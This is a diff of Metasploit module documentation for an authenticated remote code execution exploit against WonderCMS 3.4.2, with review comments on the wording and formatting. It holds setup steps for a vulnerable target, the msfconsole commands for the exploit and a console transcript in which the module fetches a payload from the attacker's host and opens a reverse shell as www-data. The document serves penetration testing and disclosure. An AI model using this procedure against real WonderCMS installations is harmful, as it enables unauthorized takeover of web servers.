|
1 | 1 | ## Vulnerable Application |
2 | 2 |
|
3 | | -Instructions to get the vulnerable application. If applicable, include links to the vulnerable install |
4 | | -files, as well as instructions on installing/configuring the environment if it is different than a |
5 | | -standard install. Much of this will come from the PR, and can be copy/pasted. |
| 3 | +[WonderCMS](https://www.wondercms.com/) is a free and open-source Content Management System (CMS). The main advantage is that only one PHP file controls the whole management. Follow next steps to install application: |
| 4 | + |
| 5 | +1. Install Apache2 and PHP on server |
| 6 | +2. Download WonderCMS from [here](https://github.com/WonderCMS/wondercms/releases/download/3.4.2/wondercms-342.zip) |
| 7 | +3. Enable Apache2 Rewrite Engine: `sudo a2enmod rewrite` |
| 8 | + |
6 | 9 |
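Review bot: The install steps under Vulnerable Application stop at `sudo a2enmod rewrite` and never say to extract the downloaded archive into the web root or to restart Apache so the rewrite module takes effect, so a reader following them does not end up with a running target. Add those steps, and state the affected version in the text rather than only in the download URL, which points at 3.4.2. The sentence "Follow next steps to install application:" also needs its articles ("Follow these steps to install the application:").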
|
7 | 10 | ## Verification Steps |
8 | | -Example steps in this format (is also in the PR): |
9 | 11 |
|
10 | 12 | 1. Install the application |
11 | | -1. Start msfconsole |
12 | | -1. Do: `use [module path]` |
13 | | -1. Do: `run` |
14 | | -1. You should get a shell. |
| 13 | +2. Start msfconsole |
| 14 | +3. Do: `use multi/http/wondercms_rce` |
| 15 | +4. Do: `set PASSWORD [password]' |
| 16 | +5. Do: `set LHOST [attacker IP]` |
| 17 | +6. Do: `set LPORT [attacker PORT]` |
| 18 | +4. Do: `run` |
| 19 | +5. You should get a shell. |
15 | 20 |
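Review bot: The Verification Steps list is numbered 1 to 6 and then drops back to 4 and 5 for `run` and "You should get a shell.", and the `set PASSWORD [password]'` step closes its inline code with a single quote instead of a backtick, which breaks the rendering of that line. Renumber the last two steps as 7 and 8 (or keep the template's all-`1.` numbering), fix the closing backtick, and add a step for setting the target host (`set RHOSTS [target IP]`), which none of the listed steps cover.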
|
16 | 21 | ## Options |
17 | | -List each option and how to use it. |
18 | 22 |
|
19 | | -### Option Name |
| 23 | +### PASSWORD |
20 | 24 |
|
21 | | -Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here. |
| 25 | +WonderCMS generates one global password that gets generated upon first run of application. This is global admin password that controls the whole CMS. This password has to be used in the exploit to get authenticated access. |
22 | 26 |
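Review bot: The PASSWORD description says the password "gets generated upon first run of application" but does not say where the tester obtains it or whether the option has a default value, which is what someone setting the option needs to know. Add that, and remove the repetition in "generates one global password that gets generated".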
|
23 | 27 | ## Scenarios |
24 | | -Specific demo of using the module that might be useful in a real world scenario. |
25 | | - |
26 | | -### Version and OS |
27 | 28 |
|
28 | 29 | ``` |
29 | | -code or console output |
| 30 | +msf6 exploit(multi/http/wondercms_rce) > set LHOST 192.168.168.152 |
| 31 | +LHOST => 192.168.168.152 |
| 32 | +msf6 exploit(multi/http/wondercms_rce) > set LPORT 4444 |
| 33 | +LPORT => 4444 |
| 34 | +msf6 exploit(multi/http/wondercms_rce) > exploit |
| 35 | +[*] Exploit running as background job 28. |
| 36 | +[*] Exploit completed, but no session was created. |
| 37 | +msf6 exploit(multi/http/wondercms_rce) > |
| 38 | +[*] Started reverse TCP handler on 192.168.168.152:4444 |
| 39 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 40 | +[*] Target is probably WonderCMS.. |
| 41 | +[+] The target is vulnerable. Version 3.4.2 is affected |
| 42 | +[*] Using URL: http://192.168.168.152:8082/81k4.zip |
| 43 | +[*] Received request, sending payload.. |
| 44 | +[*] Server stopped. |
| 45 | +[*] Command shell session 5 opened (192.168.168.152:4444 -> 192.168.168.146:37068) at 2025-04-25 14:46:20 +0200 |
| 46 | +
|
| 47 | +msf6 exploit(multi/http/wondercms_rce) > sessions 5 |
| 48 | +[*] Starting interaction with 5... |
| 49 | +
|
| 50 | +whoami |
| 51 | +www-data |
| 52 | +id |
| 53 | +uid=33(www-data) gid=33(www-data) groups=33(www-data) |
30 | 54 | ``` |
31 | 55 |
|
32 | | -For example: |
33 | | - |
34 | | -To do this specific thing, here's how you do it: |
35 | | - |
36 | | -``` |
37 | | -msf > use module_name |
38 | | -msf auxiliary(module_name) > set POWERLEVEL >9000 |
39 | | -msf auxiliary(module_name) > exploit |
40 | | -``` |
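Review bot: The console output in Scenarios begins at `set LHOST` and never shows the target or `PASSWORD` being set, although the Options section says the password is needed for authenticated access, and the template's "### Version and OS" heading was deleted without a replacement. Show the full option setup in the transcript and put it under a heading that names the tested version and OS (the check output reports 3.4.2). The line "Exploit completed, but no session was created." appears before the handler starts and before session 5 opens, so a short explanation that the module ran as a background job would keep readers from taking it as a failure.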
|